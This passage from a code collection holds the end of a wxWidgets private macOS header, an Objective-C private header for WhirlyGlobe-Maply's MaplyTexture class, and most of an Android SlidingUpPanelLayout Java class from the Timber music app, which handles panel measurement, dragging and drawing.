must be implemented by all toolkits\n\n static wxNonOwnedWindowImpl* CreateNonOwnedWindow( wxNonOwnedWindow* wxpeer, wxWindow* parent, WXWindow native) ;\n\n static wxNonOwnedWindowImpl* CreateNonOwnedWindow( wxNonOwnedWindow* wxpeer, wxWindow* parent, const wxPoint& pos, const wxSize& size,\n long style, long extraStyle, const wxString& name ) ;\n\n virtual void SetModified(bool WXUNUSED(modified)) { }\n virtual bool IsModified() const { return false; }\n\n virtual void SetRepresentedFilename(const wxString& WXUNUSED(filename)) { }\n\n#if wxOSX_USE_IPHONE\n virtual CGFloat GetWindowLevel() const { return 0.0; }\n#else\n virtual CGWindowLevel GetWindowLevel() const { return kCGNormalWindowLevel; }\n#endif\n virtual void RestoreWindowLevel() {}\nprotected :\n wxNonOwnedWindow* m_wxPeer;\n wxDECLARE_ABSTRACT_CLASS(wxNonOwnedWindowImpl);\n};\n\n#endif // wxUSE_GUI\n\n//---------------------------------------------------------------------------\n// cocoa bridging utilities\n//---------------------------------------------------------------------------\n\nbool wxMacInitCocoa();\n\nclass WXDLLIMPEXP_CORE wxMacAutoreleasePool\n{\npublic :\n wxMacAutoreleasePool();\n ~wxMacAutoreleasePool();\nprivate :\n void* m_pool;\n};\n\n// NSObject\n\nvoid wxMacCocoaRelease( void* obj );\nvoid wxMacCocoaAutorelease( void* obj );\nvoid* wxMacCocoaRetain( void* obj );\n\n\n#endif\n // _WX_PRIVATE_CORE_H_\n"} {"text": "/*\n * MaplyTexture_private.h\n * WhirlyGlobe-MaplyComponent\n *\n * Created by Steve Gifford on 10/25/13.\n * Copyright 2011-2017 mousebird consulting\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\n */\n\n#import \n#import \"MaplyTexture.h\"\n#import \"MaplyRenderController.h\"\n#import \"WhirlyGlobe.h\"\n\n@class MaplyBaseInteractionLayer;\n\n@interface MaplyTexture()\n\n// The view controller the texture is nominally associated with\n@property (nonatomic,weak) MaplyBaseInteractionLayer *interactLayer;\n\n// If this came from a UIImage, the UIImage it came from\n@property (nonatomic,weak) UIImage *image;\n\n// Set if this is a sub texture reference\n@property (nonatomic) bool isSubTex;\n\n// Set if we created the texture\n@property (nonatomic,assign) int width,height;\n\n// If set, the texture ID associated with this texture\n@property (nonatomic) WhirlyKit::SimpleIdentity texID;\n\n// Set while we're waiting for the texture to go away\n@property (nonatomic) bool isBeingRemoved;\n\n// Clear out the texture we're holding\n- (void)clear;\n\n@end\n"} {"text": "package com.naman14.timber.slidinguppanel;\n\nimport android.annotation.SuppressLint;\nimport android.content.Context;\nimport android.content.res.TypedArray;\nimport android.graphics.Canvas;\nimport android.graphics.Paint;\nimport android.graphics.PixelFormat;\nimport android.graphics.Rect;\nimport android.graphics.drawable.Drawable;\nimport android.os.Parcel;\nimport android.os.Parcelable;\nimport android.support.v4.content.ContextCompat;\nimport android.support.v4.view.MotionEventCompat;\nimport 
android.support.v4.view.ViewCompat;\nimport android.util.AttributeSet;\nimport android.view.Gravity;\nimport android.view.MotionEvent;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.accessibility.AccessibilityEvent;\n\nimport com.naman14.timber.R;\n\npublic class SlidingUpPanelLayout extends ViewGroup {\n\n private static final String TAG = SlidingUpPanelLayout.class.getSimpleName();\n\n /**\n * Default peeking out panel height\n */\n private static final int DEFAULT_PANEL_HEIGHT = 68; // dp;\n\n /**\n * Default anchor point height\n */\n private static final float DEFAULT_ANCHOR_POINT = 1.0f; // In relative %\n /**\n * Default height of the shadow above the peeking out panel\n */\n private static final int DEFAULT_SHADOW_HEIGHT = 4; // dp;\n /**\n * If no fade color is given by default it will fade to 80% gray.\n */\n private static final int DEFAULT_FADE_COLOR = 0x99000000;\n /**\n * Whether we should hook up the drag view clickable state\n */\n private static final boolean DEFAULT_DRAG_VIEW_CLICKABLE = true;\n /**\n * Default Minimum velocity that will be detected as a fling\n */\n private static final int DEFAULT_MIN_FLING_VELOCITY = 400; // dips per second\n /**\n * Default is set to false because that is how it was written\n */\n private static final boolean DEFAULT_OVERLAY_FLAG = false;\n /**\n * Default attributes for layout\n */\n private static final int[] DEFAULT_ATTRS = new int[]{\n android.R.attr.gravity\n };\n /**\n * Default paralax length of the main view\n */\n private static final int DEFAULT_PARALAX_OFFSET = 0;\n /**\n * Default slide panel offset when collapsed\n */\n private static final int DEFAULT_SLIDE_PANEL_OFFSET = 0;\n /**\n * Default direct offset flag\n */\n private static final boolean DEFAULT_DIRECT_OFFSET_FLAG = false;\n /**\n * Default initial state for the component\n */\n private static SlideState DEFAULT_SLIDE_STATE = SlideState.COLLAPSED;\n /**\n * The paint used to dim the main layout when sliding\n */\n private final Paint mCoveredFadePaint = new Paint();\n /**\n * Drawable used to draw the shadow between panes.\n */\n private final Drawable mShadowDrawable;\n private final ViewDragHelper mDragHelper;\n private final Rect mTmpRect = new Rect();\n /**\n * Minimum velocity that will be detected as a fling\n */\n private int mMinFlingVelocity = DEFAULT_MIN_FLING_VELOCITY;\n /**\n * The fade color used for the panel covered by the slider. 0 = no fading.\n */\n private int mCoveredFadeColor = DEFAULT_FADE_COLOR;\n /**\n * The size of the overhang in pixels.\n */\n private int mPanelHeight = -1;\n /**\n * Determines how much to slide the panel off when expanded\n */\n private int mSlidePanelOffset = 0;\n /**\n * The size of the shadow in pixels.\n */\n private int mShadowHeight = -1;\n /**\n * Paralax offset\n */\n private int mParallaxOffset = -1;\n /**\n * Clamps the Main view to the slideable view\n */\n private boolean mDirectOffset = false;\n /**\n * True if the collapsed panel should be dragged up.\n */\n private boolean mIsSlidingUp;\n /**\n * Panel overlays the windows instead of putting it underneath it.\n */\n private boolean mOverlayContent = DEFAULT_OVERLAY_FLAG;\n /**\n * If provided, the panel can be dragged by only this view. Otherwise, the entire panel can be\n * used for dragging.\n */\n private View mDragView;\n /**\n * If provided, the panel can be dragged by only this view. 
Otherwise, the entire panel can be\n * used for dragging.\n */\n private int mDragViewResId = -1;\n /**\n * Whether clicking on the drag view will expand/collapse\n */\n private boolean mDragViewClickable = DEFAULT_DRAG_VIEW_CLICKABLE;\n /**\n * The child view that can slide, if any.\n */\n private View mSlideableView;\n /**\n * The main view\n */\n private View mMainView;\n /**\n * The background view\n */\n private View mBackgroundView;\n private SlideState mSlideState = SlideState.COLLAPSED;\n /**\n * How far the panel is offset from its expanded position.\n * range [0, 1] where 0 = collapsed, 1 = expanded.\n */\n private float mSlideOffset;\n /**\n * How far in pixels the slideable panel may move.\n */\n private int mSlideRange;\n /**\n * A panel view is locked into internal scrolling or another condition that\n * is preventing a drag.\n */\n private boolean mIsUnableToDrag;\n /**\n * Flag indicating that sliding feature is enabled\\disabled\n */\n private boolean mIsSlidingEnabled;\n /**\n * Flag indicating if a drag view can have its own touch events. If set\n * to true, a drag view can scroll horizontally and have its own click listener.\n *
\n * Default is set to false.\n */\n private boolean mIsUsingDragViewTouchEvents;\n private float mInitialMotionX;\n private float mInitialMotionY;\n private float mAnchorPoint = 1.f;\n private PanelSlideListener mPanelSlideListener;\n /**\n * Stores whether or not the pane was expanded the last time it was slideable.\n * If expand/collapse operations are invoked this state is modified. Used by\n * instance state save/restore.\n */\n private boolean mFirstLayout = true;\n\n public SlidingUpPanelLayout(Context context) {\n this(context, null);\n }\n\n public SlidingUpPanelLayout(Context context, AttributeSet attrs) {\n this(context, attrs, 0);\n }\n\n public SlidingUpPanelLayout(Context context, AttributeSet attrs, int defStyle) {\n super(context, attrs, defStyle);\n\n if (isInEditMode()) {\n mShadowDrawable = null;\n mDragHelper = null;\n return;\n }\n\n if (attrs != null) {\n TypedArray defAttrs = context.obtainStyledAttributes(attrs, DEFAULT_ATTRS);\n\n if (defAttrs != null) {\n int gravity = defAttrs.getInt(0, Gravity.NO_GRAVITY);\n if (gravity != Gravity.TOP && gravity != Gravity.BOTTOM) {\n throw new IllegalArgumentException(\"gravity must be set to either top or bottom\");\n }\n mIsSlidingUp = gravity == Gravity.BOTTOM;\n }\n\n defAttrs.recycle();\n\n TypedArray ta = context.obtainStyledAttributes(attrs, R.styleable.SlidingUpPanelLayout);\n\n if (ta != null) {\n mPanelHeight = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_panelHeight, -1);\n mSlidePanelOffset = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_slidePanelOffset, DEFAULT_SLIDE_PANEL_OFFSET);\n mShadowHeight = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_shadowHeight, -1);\n mParallaxOffset = ta.getDimensionPixelSize(R.styleable.SlidingUpPanelLayout_paralaxOffset, -1);\n mDirectOffset = ta.getBoolean(R.styleable.SlidingUpPanelLayout_directOffset, DEFAULT_DIRECT_OFFSET_FLAG);\n\n mMinFlingVelocity = ta.getInt(R.styleable.SlidingUpPanelLayout_flingVelocity, DEFAULT_MIN_FLING_VELOCITY);\n mCoveredFadeColor = ta.getColor(R.styleable.SlidingUpPanelLayout_fadeColor, DEFAULT_FADE_COLOR);\n\n mDragViewResId = ta.getResourceId(R.styleable.SlidingUpPanelLayout_dragView, -1);\n mDragViewClickable = ta.getBoolean(R.styleable.SlidingUpPanelLayout_dragViewClickable, DEFAULT_DRAG_VIEW_CLICKABLE);\n\n mOverlayContent = ta.getBoolean(R.styleable.SlidingUpPanelLayout_overlay, DEFAULT_OVERLAY_FLAG);\n\n mAnchorPoint = ta.getFloat(R.styleable.SlidingUpPanelLayout_anchorPoint, DEFAULT_ANCHOR_POINT);\n\n mSlideState = SlideState.values()[ta.getInt(R.styleable.SlidingUpPanelLayout_initialState, DEFAULT_SLIDE_STATE.ordinal())];\n }\n\n ta.recycle();\n }\n\n final float density = context.getResources().getDisplayMetrics().density;\n if (mPanelHeight == -1) {\n mPanelHeight = (int) (DEFAULT_PANEL_HEIGHT * density + 0.5f);\n }\n if (mShadowHeight == -1) {\n mShadowHeight = (int) (DEFAULT_SHADOW_HEIGHT * density + 0.5f);\n }\n if (mParallaxOffset == -1) {\n mParallaxOffset = (int) (DEFAULT_PARALAX_OFFSET * density);\n }\n // If the shadow height is zero, don't show the shadow\n if (mShadowHeight > 0) {\n if (mIsSlidingUp) {\n mShadowDrawable = ContextCompat.getDrawable(context, R.drawable.above_shadow);\n } else {\n mShadowDrawable = ContextCompat.getDrawable(context, R.drawable.below_shadow);\n }\n\n } else {\n mShadowDrawable = null;\n }\n\n setWillNotDraw(false);\n\n mDragHelper = ViewDragHelper.create(this, 0.5f, new DragHelperCallback());\n mDragHelper.setMinVelocity(mMinFlingVelocity * density);\n\n 
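// Editorial note, not in the original source: the dp defaults above are converted to px with the\n        // usual round-half-up idiom, e.g. on a density-2.0 screen DEFAULT_PANEL_HEIGHT becomes\n        // (int) (68 * 2.0f + 0.5f) = 136 px; the minimum fling velocity is scaled the same way,\n        // from dp/s to px/s, before being handed to the ViewDragHelper above.\n        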
mIsSlidingEnabled = true;\n }\n\n private static boolean hasOpaqueBackground(View v) {\n final Drawable bg = v.getBackground();\n return bg != null && bg.getOpacity() == PixelFormat.OPAQUE;\n }\n\n /**\n * Set the Drag View after the view is inflated\n */\n @Override\n protected void onFinishInflate() {\n super.onFinishInflate();\n if (mDragViewResId != -1) {\n setDragView(findViewById(mDragViewResId));\n }\n }\n\n /**\n * @return The ARGB-packed color value used to fade the fixed pane\n */\n public int getCoveredFadeColor() {\n return mCoveredFadeColor;\n }\n\n /**\n * Set the color used to fade the pane covered by the sliding pane out when the pane\n * will become fully covered in the expanded state.\n *\n * @param color An ARGB-packed color value\n */\n public void setCoveredFadeColor(int color) {\n mCoveredFadeColor = color;\n invalidate();\n }\n\n public boolean isSlidingEnabled() {\n return mIsSlidingEnabled && mSlideableView != null;\n }\n\n /**\n * Set sliding enabled flag\n *\n * @param enabled flag value\n */\n public void setSlidingEnabled(boolean enabled) {\n mIsSlidingEnabled = enabled;\n }\n\n /**\n * @return The current collapsed panel height\n */\n public int getPanelHeight() {\n return mPanelHeight;\n }\n\n /**\n * Set the collapsed panel height in pixels\n *\n * @param val A height in pixels\n */\n public void setPanelHeight(int val) {\n mPanelHeight = val;\n requestLayout();\n }\n\n /**\n * Sets the panel offset when collapsed so you can exit\n * the boundaries of the top of the screen\n *\n * @param val Offset in pixels\n */\n public void setSlidePanelOffset(int val) {\n mSlidePanelOffset = val;\n requestLayout();\n }\n\n /**\n * @return The current paralax offset\n */\n public int getCurrentParalaxOffset() {\n if (mParallaxOffset < 0) {\n return 0;\n }\n\n return (int) (mParallaxOffset * getDirectionalSlideOffset());\n }\n\n /**\n * @return The directional slide offset\n */\n protected float getDirectionalSlideOffset() {\n return mIsSlidingUp ? -mSlideOffset : mSlideOffset;\n }\n\n /**\n * Sets the panel slide listener\n *\n * @param listener\n */\n public void setPanelSlideListener(PanelSlideListener listener) {\n mPanelSlideListener = listener;\n }\n\n /**\n * Set the draggable view portion. 
Use to null, to allow the whole panel to be draggable\n *\n * @param dragView A view that will be used to drag the panel.\n */\n public void setDragView(View dragView) {\n if (mDragView != null && mDragViewClickable) {\n mDragView.setOnClickListener(null);\n }\n mDragView = dragView;\n if (mDragView != null) {\n mDragView.setClickable(true);\n mDragView.setFocusable(false);\n mDragView.setFocusableInTouchMode(false);\n if (mDragViewClickable) {\n mDragView.setOnClickListener(new OnClickListener() {\n @Override\n public void onClick(View v) {\n if (!isEnabled()) return;\n if (!isPanelExpanded() && !isPanelAnchored()) {\n expandPanel(mAnchorPoint);\n } else {\n collapsePanel();\n }\n }\n });\n }\n }\n }\n\n /**\n * Gets the currently set anchor point\n *\n * @return the currently set anchor point\n */\n public float getAnchorPoint() {\n return mAnchorPoint;\n }\n\n /**\n * Set an anchor point where the panel can stop during sliding\n *\n * @param anchorPoint A value between 0 and 1, determining the position of the anchor point\n * starting from the top of the layout.\n */\n public void setAnchorPoint(float anchorPoint) {\n if (anchorPoint > 0 && anchorPoint <= 1) {\n mAnchorPoint = anchorPoint;\n }\n }\n\n /**\n * Check if the panel is set as an overlay.\n */\n public boolean isOverlayed() {\n return mOverlayContent;\n }\n\n /**\n * Sets whether or not the panel overlays the content\n *\n * @param overlayed\n */\n public void setOverlayed(boolean overlayed) {\n mOverlayContent = overlayed;\n }\n\n void dispatchOnPanelSlide(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelSlide(panel, mSlideOffset);\n }\n }\n\n void dispatchOnPanelExpanded(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelExpanded(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelCollapsed(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelCollapsed(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelAnchored(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelAnchored(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void dispatchOnPanelHidden(View panel) {\n if (mPanelSlideListener != null) {\n mPanelSlideListener.onPanelHidden(panel);\n }\n sendAccessibilityEvent(AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED);\n }\n\n void updateObscuredViewVisibility() {\n if (getChildCount() == 0) {\n return;\n }\n final int leftBound = getPaddingLeft();\n final int rightBound = getWidth() - getPaddingRight();\n final int topBound = getPaddingTop();\n final int bottomBound = getHeight() - getPaddingBottom();\n final int left;\n final int right;\n final int top;\n final int bottom;\n if (mSlideableView != null && hasOpaqueBackground(mSlideableView)) {\n left = mSlideableView.getLeft();\n right = mSlideableView.getRight();\n top = mSlideableView.getTop();\n bottom = mSlideableView.getBottom();\n } else {\n left = right = top = bottom = 0;\n }\n View child = mMainView;\n final int clampedChildLeft = Math.max(leftBound, child.getLeft());\n final int clampedChildTop = Math.max(topBound, child.getTop());\n final int clampedChildRight = Math.min(rightBound, child.getRight());\n final int clampedChildBottom = Math.min(bottomBound, child.getBottom());\n final int vis;\n if (clampedChildLeft >= left && clampedChildTop >= top &&\n clampedChildRight <= right && 
clampedChildBottom <= bottom) {\n vis = INVISIBLE;\n } else {\n vis = VISIBLE;\n }\n child.setVisibility(vis);\n }\n\n void setAllChildrenVisible() {\n for (int i = 0, childCount = getChildCount(); i < childCount; i++) {\n final View child = getChildAt(i);\n if (child.getVisibility() == INVISIBLE) {\n child.setVisibility(VISIBLE);\n }\n }\n }\n\n @Override\n protected void onAttachedToWindow() {\n super.onAttachedToWindow();\n mFirstLayout = true;\n }\n\n @Override\n protected void onDetachedFromWindow() {\n super.onDetachedFromWindow();\n mFirstLayout = true;\n }\n\n @Override\n protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {\n final int widthMode = MeasureSpec.getMode(widthMeasureSpec);\n final int widthSize = MeasureSpec.getSize(widthMeasureSpec);\n final int heightMode = MeasureSpec.getMode(heightMeasureSpec);\n final int heightSize = MeasureSpec.getSize(heightMeasureSpec);\n\n if (widthMode != MeasureSpec.EXACTLY) {\n throw new IllegalStateException(\"Width must have an exact value or MATCH_PARENT\");\n } else if (heightMode != MeasureSpec.EXACTLY) {\n throw new IllegalStateException(\"Height must have an exact value or MATCH_PARENT\");\n }\n\n final int childCount = getChildCount();\n\n if (childCount != 2 && childCount != 3) {\n throw new IllegalStateException(\"Sliding up panel layout must have exactly 2 or 3 children!\");\n }\n\n if (childCount == 2) {\n mMainView = getChildAt(0);\n mSlideableView = getChildAt(1);\n } else {\n mBackgroundView = getChildAt(0);\n mMainView = getChildAt(1);\n mSlideableView = getChildAt(2);\n }\n\n if (mDragView == null) {\n setDragView(mSlideableView);\n }\n\n // If the sliding panel is not visible, then put the whole view in the hidden state\n if (mSlideableView.getVisibility() == GONE) {\n mSlideState = SlideState.HIDDEN;\n }\n\n int layoutHeight = heightSize - getPaddingTop() - getPaddingBottom();\n\n // First pass. 
Measure based on child LayoutParams width/height.\n for (int i = 0; i < childCount; i++) {\n final View child = getChildAt(i);\n final LayoutParams lp = (LayoutParams) child.getLayoutParams();\n\n // We always measure the sliding panel in order to know it's height (needed for show panel)\n if (child.getVisibility() == GONE && child == mMainView) {\n continue;\n }\n\n int height = layoutHeight;\n if (child == mMainView && !mOverlayContent && mSlideState != SlideState.HIDDEN) {\n height -= mPanelHeight;\n }\n\n int childWidthSpec;\n if (lp.width == LayoutParams.WRAP_CONTENT) {\n childWidthSpec = MeasureSpec.makeMeasureSpec(widthSize, MeasureSpec.AT_MOST);\n } else if (lp.width == LayoutParams.MATCH_PARENT) {\n childWidthSpec = MeasureSpec.makeMeasureSpec(widthSize, MeasureSpec.EXACTLY);\n } else {\n childWidthSpec = MeasureSpec.makeMeasureSpec(lp.width, MeasureSpec.EXACTLY);\n }\n\n int childHeightSpec;\n if (lp.height == LayoutParams.WRAP_CONTENT) {\n childHeightSpec = MeasureSpec.makeMeasureSpec(height, MeasureSpec.AT_MOST);\n } else if (lp.height == LayoutParams.MATCH_PARENT) {\n childHeightSpec = MeasureSpec.makeMeasureSpec(height, MeasureSpec.EXACTLY);\n } else {\n childHeightSpec = MeasureSpec.makeMeasureSpec(lp.height, MeasureSpec.EXACTLY);\n }\n\n if (child == mSlideableView) {\n mSlideRange = MeasureSpec.getSize(childHeightSpec) - mPanelHeight + mSlidePanelOffset;\n childHeightSpec += mSlidePanelOffset;\n }\n\n child.measure(childWidthSpec, childHeightSpec);\n }\n\n setMeasuredDimension(widthSize, heightSize);\n }\n\n @Override\n protected void onLayout(boolean changed, int l, int t, int r, int b) {\n final int paddingLeft = getPaddingLeft();\n final int paddingTop = getPaddingTop();\n\n final int childCount = getChildCount();\n\n if (mFirstLayout) {\n switch (mSlideState) {\n case EXPANDED:\n mSlideOffset = 1.0f;\n break;\n case ANCHORED:\n mSlideOffset = mAnchorPoint;\n break;\n case HIDDEN:\n int newTop = computePanelTopPosition(0.0f) + (mIsSlidingUp ? +mPanelHeight : -mPanelHeight);\n mSlideOffset = computeSlideOffset(newTop);\n break;\n default:\n mSlideOffset = 0.f;\n break;\n }\n }\n\n for (int i = 0; i < childCount; i++) {\n final View child = getChildAt(i);\n\n // Always layout the sliding view on the first layout\n if (child.getVisibility() == GONE && (child == mMainView || mFirstLayout)) {\n continue;\n }\n\n final int childHeight = child.getMeasuredHeight();\n int childTop = paddingTop;\n\n if (child == mSlideableView) {\n childTop = computePanelTopPosition(mSlideOffset);\n }\n\n if (!mIsSlidingUp) {\n if (child == mMainView && !mOverlayContent) {\n childTop = computePanelTopPosition(mSlideOffset) + mSlideableView.getMeasuredHeight();\n }\n }\n final int childBottom = childTop + childHeight;\n final int childLeft = paddingLeft;\n final int childRight = childLeft + child.getMeasuredWidth();\n\n child.layout(childLeft, childTop, childRight, childBottom);\n }\n\n if (mFirstLayout) {\n updateObscuredViewVisibility();\n }\n\n mFirstLayout = false;\n }\n\n @Override\n protected void onSizeChanged(int w, int h, int oldw, int oldh) {\n super.onSizeChanged(w, h, oldw, oldh);\n // Recalculate sliding panes and their details\n if (h != oldh) {\n mFirstLayout = true;\n }\n }\n\n /**\n * Set if the drag view can have its own touch events. If set\n * to true, a drag view can scroll horizontally and have its own click listener.\n *
\n * Default is set to false.\n */\n public void setEnableDragViewTouchEvents(boolean enabled) {\n mIsUsingDragViewTouchEvents = enabled;\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n if (!enabled) {\n collapsePanel();\n }\n super.setEnabled(enabled);\n }\n\n @Override\n public boolean onInterceptTouchEvent(MotionEvent ev) {\n final int action = MotionEventCompat.getActionMasked(ev);\n\n\n if (!isEnabled() || !mIsSlidingEnabled || (mIsUnableToDrag && action != MotionEvent.ACTION_DOWN)) {\n mDragHelper.cancel();\n return super.onInterceptTouchEvent(ev);\n }\n\n if (action == MotionEvent.ACTION_CANCEL || action == MotionEvent.ACTION_UP) {\n mDragHelper.cancel();\n return false;\n }\n\n final float x = ev.getX();\n final float y = ev.getY();\n\n switch (action) {\n case MotionEvent.ACTION_DOWN: {\n mIsUnableToDrag = false;\n mInitialMotionX = x;\n mInitialMotionY = y;\n break;\n }\n\n case MotionEvent.ACTION_MOVE: {\n final float adx = Math.abs(x - mInitialMotionX);\n final float ady = Math.abs(y - mInitialMotionY);\n final int dragSlop = mDragHelper.getTouchSlop();\n\n // Handle any horizontal scrolling on the drag view.\n if (mIsUsingDragViewTouchEvents && adx > dragSlop && ady < dragSlop) {\n return super.onInterceptTouchEvent(ev);\n }\n\n if ((ady > dragSlop && adx > ady) || !isDragViewUnder((int) mInitialMotionX, (int) mInitialMotionY)) {\n mDragHelper.cancel();\n mIsUnableToDrag = true;\n return false;\n }\n break;\n }\n }\n\n return mDragHelper.shouldInterceptTouchEvent(ev);\n }\n\n @Override\n public boolean onTouchEvent(MotionEvent ev) {\n if (!isSlidingEnabled()) {\n return super.onTouchEvent(ev);\n }\n mDragHelper.processTouchEvent(ev);\n return true;\n }\n\n private boolean isDragViewUnder(int x, int y) {\n if (mDragView == null) return false;\n int[] viewLocation = new int[2];\n mDragView.getLocationOnScreen(viewLocation);\n int[] parentLocation = new int[2];\n this.getLocationOnScreen(parentLocation);\n int screenX = parentLocation[0] + x;\n int screenY = parentLocation[1] + y;\n return screenX >= viewLocation[0] && screenX < viewLocation[0] + mDragView.getWidth() &&\n screenY >= viewLocation[1] && screenY < viewLocation[1] + mDragView.getHeight();\n }\n\n private boolean expandPanel(View pane, int initialVelocity, float mSlideOffset) {\n return mFirstLayout || smoothSlideTo(mSlideOffset, initialVelocity);\n }\n\n private boolean collapsePanel(View pane, int initialVelocity) {\n return mFirstLayout || smoothSlideTo(0.0f, initialVelocity);\n }\n\n /*\n * Computes the top position of the panel based on the slide offset.\n */\n private int computePanelTopPosition(float slideOffset) {\n int slidingViewHeight = mSlideableView != null ? mSlideableView.getMeasuredHeight() : 0;\n int slidePixelOffset = (int) (slideOffset * mSlideRange);\n // Compute the top of the panel if its collapsed\n return mIsSlidingUp\n ? getMeasuredHeight() - getPaddingBottom() - mPanelHeight - slidePixelOffset\n : getPaddingTop() - slidingViewHeight + mPanelHeight + slidePixelOffset;\n }\n\n /*\n * Computes the slide offset based on the top position of the panel\n */\n private float computeSlideOffset(int topPosition) {\n // Compute the panel top position if the panel is collapsed (offset 0)\n final int topBoundCollapsed = computePanelTopPosition(0);\n\n // Determine the new slide offset based on the collapsed top position and the new required\n // top position\n return (mIsSlidingUp\n ? 
(float) (topBoundCollapsed - topPosition) / mSlideRange\n : (float) (topPosition - topBoundCollapsed) / mSlideRange);\n }\n\n /**\n * Collapse the sliding pane if it is currently slideable. If first layout\n * has already completed this will animate.\n *\n * @return true if the pane was slideable and is now collapsed/in the process of collapsing\n */\n public boolean collapsePanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.COLLAPSED;\n return true;\n } else {\n if (mSlideState == SlideState.HIDDEN || mSlideState == SlideState.COLLAPSED)\n return false;\n return collapsePanel(mSlideableView, 0);\n }\n }\n\n /**\n * Expand the sliding pane if it is currently slideable.\n *\n * @return true if the pane was slideable and is now expanded/in the process of expading\n */\n public boolean expandPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.EXPANDED;\n return true;\n } else {\n return expandPanel(1.0f);\n }\n }\n\n /**\n * Expand the sliding pane to the anchor point if it is currently slideable.\n *\n * @return true if the pane was slideable and is now expanded/in the process of expading\n */\n public boolean anchorPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.ANCHORED;\n return true;\n } else {\n return expandPanel(mAnchorPoint);\n }\n }\n\n /**\n * Partially expand the sliding panel up to a specific offset\n *\n * @param mSlideOffset Value between 0 and 1, where 0 is completely expanded.\n * @return true if the pane was slideable and is now expanded/in the process of expanding\n */\n public boolean expandPanel(float mSlideOffset) {\n if (mSlideableView == null || mSlideState == SlideState.EXPANDED) return false;\n mSlideableView.setVisibility(View.VISIBLE);\n return expandPanel(mSlideableView, 0, mSlideOffset);\n }\n\n /**\n * Check if the sliding panel in this layout is fully expanded.\n *\n * @return true if sliding panel is completely expanded\n */\n public boolean isPanelExpanded() {\n return mSlideState == SlideState.EXPANDED;\n }\n\n /**\n * Check if the sliding panel in this layout is anchored.\n *\n * @return true if sliding panel is anchored\n */\n public boolean isPanelAnchored() {\n return mSlideState == SlideState.ANCHORED;\n }\n\n /**\n * Check if the sliding panel in this layout is currently visible.\n *\n * @return true if the sliding panel is visible.\n */\n public boolean isPanelHidden() {\n return mSlideState == SlideState.HIDDEN;\n }\n\n /**\n * Shows the panel from the hidden state\n */\n public void showPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.COLLAPSED;\n } else {\n if (mSlideableView == null || mSlideState != SlideState.HIDDEN) return;\n mSlideableView.setVisibility(View.VISIBLE);\n requestLayout();\n smoothSlideTo(0, 0);\n }\n }\n\n /**\n * Hides the sliding panel entirely.\n */\n public void hidePanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.HIDDEN;\n } else {\n if (mSlideState == SlideState.DRAGGING || mSlideState == SlideState.HIDDEN) return;\n int newTop = computePanelTopPosition(0.0f) + (mIsSlidingUp ? 
+mPanelHeight : -mPanelHeight);\n smoothSlideTo(computeSlideOffset(newTop), 0);\n }\n }\n\n @SuppressLint(\"NewApi\")\n private void onPanelDragged(int newTop) {\n mSlideState = SlideState.DRAGGING;\n // Recompute the slide offset based on the new top position\n mSlideOffset = computeSlideOffset(newTop);\n // Update the parallax based on the new slide offset\n if ((mParallaxOffset > 0 || mDirectOffset) && mSlideOffset >= 0) {\n int mainViewOffset = 0;\n if (mParallaxOffset > 0) {\n mainViewOffset = getCurrentParalaxOffset();\n } else {\n mainViewOffset = (int) (getDirectionalSlideOffset() * mSlideRange);\n }\n\n mMainView.setTranslationY(mainViewOffset);\n }\n\n // Dispatch the slide event\n dispatchOnPanelSlide(mSlideableView);\n // If the slide offset is negative, and overlay is not on, we need to increase the\n // height of the main content\n if (mSlideOffset <= 0 && !mOverlayContent) {\n // expand the main view\n LayoutParams lp = (LayoutParams) mMainView.getLayoutParams();\n lp.height = mIsSlidingUp ? (newTop - getPaddingBottom()) : (getHeight() - getPaddingBottom() - mSlideableView.getMeasuredHeight() - newTop);\n mMainView.requestLayout();\n }\n }\n\n @Override\n protected boolean drawChild(Canvas canvas, View child, long drawingTime) {\n boolean result;\n final int save = canvas.save(Canvas.CLIP_SAVE_FLAG);\n\n if (isSlidingEnabled() && mMainView == child) {\n // Clip against the slider; no sense drawing what will immediately be covered,\n // Unless the panel is set to overlay content\n if (!mOverlayContent) {\n canvas.getClipBounds(mTmpRect);\n if (mIsSlidingUp) {\n mTmpRect.bottom = Math.min(mTmpRect.bottom, mSlideableView.getTop());\n } else {\n mTmpRect.top = Math.max(mTmpRect.top, mSlideableView.getBottom());\n }\n canvas.clipRect(mTmpRect);\n }\n }\n\n result = super.drawChild(canvas, child, drawingTime);\n canvas.restoreToCount(save);\n\n if (mCoveredFadeColor != 0 && mSlideOffset > 0) {\n final int baseAlpha = (mCoveredFadeColor & 0xff000000) >>> 24;\n final int imag = (int) (baseAlpha * mSlideOffset);\n final int color = imag << 24 | (mCoveredFadeColor & 0xffffff);\n mCoveredFadePaint.setColor(color);\n canvas.drawRect(mTmpRect, mCoveredFadePaint);\n }\n\n return result;\n }\n\n /**\n * Smoothly animate mDraggingPane to the target X position within its range.\n *\n * @param slideOffset position to animate to\n * @param velocity initial velocity 